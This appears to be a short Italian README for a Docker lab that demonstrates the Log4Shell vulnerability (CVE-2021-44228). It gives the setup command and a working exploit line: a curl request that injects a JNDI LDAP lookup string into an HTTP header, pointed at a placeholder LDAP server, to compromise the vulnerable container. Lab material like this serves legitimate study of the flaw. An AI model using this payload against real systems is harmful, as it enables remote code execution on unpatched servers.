
CVE-2021-44228
Questo repository è una configurazione a riga singola per il laboratorio di exploit log4shell.
Configura il laboratorio: docker-compose up -d
Esegui l'exploit: curl -X GET http://localhost:8080/ -H "X-Api-Version: ${jndi:ldap://my_ldap_server:1389/a}"
Poi vai al container vul e vedi che abbiamo effettivamente compromesso la macchina:
